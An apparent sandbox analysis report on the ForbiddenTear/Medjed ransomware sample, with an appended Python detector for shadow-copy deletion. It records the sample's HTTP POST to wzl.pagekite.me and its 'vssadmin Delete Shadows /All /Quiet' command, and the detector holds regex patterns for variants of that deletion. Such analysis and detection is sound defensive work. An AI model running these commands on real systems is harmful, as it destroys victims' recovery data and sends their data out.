ProductVersion    1.0.0.0
FileDescription   Medjed
OriginalFilename  ForbiddenTear.exe

                                                                                  Network Behavior

                                                                                  Network Port Distribution

                                                                                  TCP Packets

Timestamp                           Source Port  Dest Port  Source IP       Dest IP
Dec 2, 2020 16:27:22.719651937 CET  49709        80         192.168.2.3     95.216.167.199
Dec 2, 2020 16:27:22.759891987 CET  80           49709      95.216.167.199  192.168.2.3
Dec 2, 2020 16:27:22.760039091 CET  49709        80         192.168.2.3     95.216.167.199
Dec 2, 2020 16:27:22.760946035 CET  49709        80         192.168.2.3     95.216.167.199
Dec 2, 2020 16:27:22.800873995 CET  80           49709      95.216.167.199  192.168.2.3
Dec 2, 2020 16:27:22.828042984 CET  80           49709      95.216.167.199  192.168.2.3
Dec 2, 2020 16:27:22.828517914 CET  80           49709      95.216.167.199  192.168.2.3
Dec 2, 2020 16:27:22.829118013 CET  49709        80         192.168.2.3     95.216.167.199
Dec 2, 2020 16:27:22.834099054 CET  49709        80         192.168.2.3     95.216.167.199
Dec 2, 2020 16:27:22.873915911 CET  80           49709      95.216.167.199  192.168.2.3

                                                                                  UDP Packets

Timestamp                           Source Port  Dest Port  Source IP    Dest IP
Dec 2, 2020 16:27:11.377876043 CET  64185        53         192.168.2.3  8.8.8.8
Dec 2, 2020 16:27:11.404983044 CET  53           64185      8.8.8.8      192.168.2.3
Dec 2, 2020 16:27:13.216013908 CET  65110        53         192.168.2.3  8.8.8.8
Dec 2, 2020 16:27:13.243186951 CET  53           65110      8.8.8.8      192.168.2.3
Dec 2, 2020 16:27:22.479176998 CET  58361        53         192.168.2.3  8.8.8.8
Dec 2, 2020 16:27:22.641010046 CET  53           58361      8.8.8.8      192.168.2.3
Dec 2, 2020 16:27:59.587095976 CET  63492        53         192.168.2.3  8.8.8.8
Dec 2, 2020 16:27:59.614200115 CET  53           63492      8.8.8.8      192.168.2.3

                                                                                  DNS Queries

Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name             Type            Class
Dec 2, 2020 16:27:22.479176998 CET  192.168.2.3  8.8.8.8  0xcb6a    Standard query (0)  wzl.pagekite.me  A (IP address)  IN (0x0001)

                                                                                  DNS Answers

Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name             CName  Address         Type            Class
Dec 2, 2020 16:27:22.641010046 CET  8.8.8.8    192.168.2.3  0xcb6a    No error (0)  wzl.pagekite.me         95.216.167.199  A (IP address)  IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • wzl.pagekite.me

                                                                                  HTTP Packets

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.3  49709        95.216.167.199  80                C:\Users\user\Desktop\ForbiddenTear.exe

Timestamp                           kBytes transferred  Direction  Data
Dec 2, 2020 16:27:22.760946035 CET  120                 OUT        POST /write.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wzl.pagekite.me
Content-Length: 840
Expect: 100-continue
Connection: Keep-Alive
Dec 2, 2020 16:27:22.828042984 CET  121                 IN         HTTP/1.1 503 Unavailable
X-PageKite-UUID: a8e3974dd302721f212a4931562bb295ed8ab2fb
Content-Type: text/html; charset=utf-8
Pragma: no-cache
Expires: 0
Cache-Control: no-store
Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 66 72 61 6d 65 73 65 74 20 63 6f 6c 73 3d 22 2a 22 3e 3c 66 72 61 6d 65 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 61 67 65 6b 69 74 65 2e 6e 65 74 2f 6f 66 66 6c 69 6e 65 2f 3f 26 61 6d 70 3b 77 68 65 72 65 3d 46 45 26 61 6d 70 3b 70 72 6f 74 6f 3d 68 74 74 70 26 61 6d 70 3b 64 6f 6d 61 69 6e 3d 77 7a 6c 2e 70 61 67 65 6b 69 74 65 2e 6d 65 26 61 6d 70 3b 72 65 6c 61 79 3d 3a 3a 66 66 66 66 3a 39 35 2e 32 31 36 2e 31 36 37 2e 31 39 39 22 20 2f 3e 3c 6e 6f 66 72 61 6d 65 73 3e 3c 68 31 3e 53 6f 72 72 79 21 20 28 66 65 29 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 48 54 54 50 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 67 65 6b 69 74 65 2e 6e 65 74 2f 22 3e 3c 69 3e 50 61 67 65 4b 69 74 65 3c 2f 69 3e 3c 2f 61 3e 20 66 6f 72 20 3c 62 3e 77 7a 6c 2e 70 61 67 65 6b 69 74 65 2e 6d 65 3c 2f 62 3e 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 20 61 74 20 74 68 65 20 6d 6f 6d 65 6e 74 2e 3c 2f 70 3e 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 3c 21 2d 2d 20 20 2d 2d 3e 3c 2f 6e 6f 66 72 61 6d 65 73 3e 3c 2f 66 72 61 6d 65 73 65 74 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <html><frameset cols="*"><frame target="_top" src="https://pagekite.net/offline/?&amp;where=FE&amp;proto=http&amp;domain=wzl.pagekite.me&amp;relay=::ffff:95.216.167.199" /><noframes><h1>Sorry! (fe)</h1><p>The HTTP <a href="https://pagekite.net/"><i>PageKite</i></a> for <b>wzl.pagekite.me</b> is unavailable at the moment.</p><p>Please try again later.</p>... --></noframes></frameset></html>


                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  Behavior

                                                                                  System Behavior

                                                                                  General

                                                                                  Start time:16:27:14
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Users\user\Desktop\ForbiddenTear.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\Desktop\ForbiddenTear.exe'
                                                                                  Imagebase:0x370000
                                                                                  File size:569344 bytes
                                                                                  MD5 hash:8AD3B3C4396AF8F9661168F4D3FDA7A4
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:16:27:22
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:'cmd' /C vssadmin Delete Shadows /All /Quiet
                                                                                  Imagebase:0x7ff77d8b0000
                                                                                  File size:273920 bytes
                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:16:27:22
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\sihost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:sihost.exe
                                                                                  Imagebase:0x7ff6ff9b0000
                                                                                  File size:79360 bytes
                                                                                  MD5 hash:6F84A5C939F9DA91F5946AF4EC6E2503
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:16:27:23
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6b2800000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:16:27:23
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\sihost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:sihost.exe
                                                                                  Imagebase:0x7ff6ff9b0000
                                                                                  File size:79360 bytes
                                                                                  MD5 hash:6F84A5C939F9DA91F5946AF4EC6E2503
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:16:27:23
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\sihost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:sihost.exe
                                                                                  Imagebase:0x7ff6ff9b0000
                                                                                  File size:79360 bytes
                                                                                  MD5 hash:6F84A5C939F9DA91F5946AF4EC6E2503
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:16:27:24
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\sihost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:sihost.exe
                                                                                  Imagebase:0x7ff6ff9b0000
                                                                                  File size:79360 bytes
                                                                                  MD5 hash:6F84A5C939F9DA91F5946AF4EC6E2503
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:16:27:25
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\sihost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:sihost.exe
                                                                                  Imagebase:0x7ff6ff9b0000
                                                                                  File size:79360 bytes
                                                                                  MD5 hash:6F84A5C939F9DA91F5946AF4EC6E2503
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:16:27:26
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\sihost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:sihost.exe
                                                                                  Imagebase:0x7ff6ff9b0000
                                                                                  File size:79360 bytes
                                                                                  MD5 hash:6F84A5C939F9DA91F5946AF4EC6E2503
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:16:27:32
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\ctfmon.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:ctfmon.exe
                                                                                  Imagebase:0x7ff79c1b0000
                                                                                  File size:10752 bytes
                                                                                  MD5 hash:D4DAF47FBF707B23B874DE6F139CB0C7
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:16:27:36
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\cdd.dll
                                                                                  Wow64 process (32bit):
                                                                                  Commandline:
                                                                                  Imagebase:
                                                                                  File size:228352 bytes
                                                                                  MD5 hash:9455C42505ABA9DAE97F7D5F507B2570
                                                                                  Has elevated privileges:
                                                                                  Has administrator privileges:
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:16:27:36
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\LogonUI.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:'LogonUI.exe' /flags:0x0 /state0:0xa3fd2855 /state1:0x41c64e6d
                                                                                  Imagebase:0x7ff6e7730000
                                                                                  File size:13312 bytes
                                                                                  MD5 hash:3AAD3281A2953F4DDA09D7EE5BEE8BA6
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
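The cmd.exe entry above is the record of the shadow-copy deletion the sample spawns ('cmd' /C vssadmin Delete Shadows /All /Quiet, run with elevated privileges). The following Python is an added example, not part of the report or of any sandbox tooling: it parses the report's own "General" key:value layout into process records and flags command lines that remove Volume Shadow Copies. The three records are copied from the ForbiddenTear.exe, cmd.exe and conhost.exe entries above; the wmic and Win32_ShadowCopy patterns are assumptions about variants this report does not show, included so the rule is not tied to one command spelling.

```python
import re
from typing import Dict, List

# Excerpt in the report's "General" key:value layout. Values are copied from
# the ForbiddenTear.exe, cmd.exe and conhost.exe entries of this report.
REPORT_EXCERPT = r"""
General

Start time:16:27:14
Start date:02/12/2020
Path:C:\Users\user\Desktop\ForbiddenTear.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\ForbiddenTear.exe'
Imagebase:0x370000
File size:569344 bytes
MD5 hash:8AD3B3C4396AF8F9661168F4D3FDA7A4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:low

General

Start time:16:27:22
Start date:02/12/2020
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:'cmd' /C vssadmin Delete Shadows /All /Quiet
Imagebase:0x7ff77d8b0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:16:27:23
Start date:02/12/2020
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6b2800000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
"""

# Command-line shapes that delete Volume Shadow Copies (ATT&CK T1490).
# Only the vssadmin form is observed in this report; the other two are
# assumed variants added for coverage.
SHADOW_DELETE_PATTERNS = [
    re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I),
    re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I),
    re.compile(r"\bwin32_shadowcopy\b.*\bdelete\b", re.I),
]


def parse_general_blocks(text: str) -> List[Dict[str, str]]:
    """Split the report's 'General' sections into one dict per process.

    Each field is 'Key:Value'; only the first ':' separates key from value,
    so paths (C:\\...) and times (16:27:22) survive intact."""
    blocks: List[Dict[str, str]] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "General":
            current = {}
            blocks.append(current)
            continue
        if current is None or ":" not in line:
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    return blocks


def find_shadow_copy_deletion(blocks: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per process whose command line deletes shadow copies."""
    hits = []
    for b in blocks:
        cmd = b.get("Commandline", "")
        if any(p.search(cmd) for p in SHADOW_DELETE_PATTERNS):
            hits.append({
                "time": f"{b.get('Start date', '?')} {b.get('Start time', '?')}",
                "path": b.get("Path", "?"),
                "commandline": cmd,
                # vssadmin delete needs admin rights; the report's flag confirms it had them
                "elevated": b.get("Has elevated privileges") == "true",
                "technique": "T1490 Inhibit System Recovery",
            })
    return hits


if __name__ == "__main__":
    for hit in find_shadow_copy_deletion(parse_general_blocks(REPORT_EXCERPT)):
        print(f"[{hit['technique']}] {hit['time']} {hit['path']} "
              f"elevated={hit['elevated']} :: {hit['commandline']}")
```

The rule keys on the command line rather than on the image name, because in this report the deletion is launched through cmd.exe and vssadmin.exe never appears as its own entry; matching only on Path would miss it. In production telemetry the same check belongs on process-creation events, with the parent process (here the .NET sample on the user's desktop) as the second signal.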

                                                                                  Disassembly

                                                                                  Code Analysis
